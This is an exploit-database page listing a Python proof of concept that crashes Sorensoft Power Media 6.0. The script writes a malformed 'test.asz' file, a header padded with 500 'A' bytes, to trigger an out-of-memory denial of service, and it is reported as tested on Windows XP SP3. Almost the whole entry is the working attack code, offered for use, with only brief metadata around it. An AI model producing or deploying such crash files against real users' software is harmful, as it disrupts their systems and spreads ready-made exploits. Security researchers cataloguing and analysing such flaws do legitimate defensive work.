[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Sorensoft Power Media 6.0 Denial of Service

Author
Onying
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-18403
Category
dos / poc
Date add
31-05-2012
Platform
windows
#!/usr/bin/python
#
# Exploit Title: Sorensoft Power Media 6.0 (out of memory)
# software: Sorensoft power media
# version : 6.0
# link: www.sorensoft.com
# Author: Onying (@onyiing)
# Website: otakku-udang.blogspot.com
# Tested on: Windows XP SP3
 
junk ="\x41"*500
textfile = open("test.asz" , 'w')
textfile.write("ASzf      Options.dat"+junk)
textfile.close()



#  0day.today [2024-11-16]  #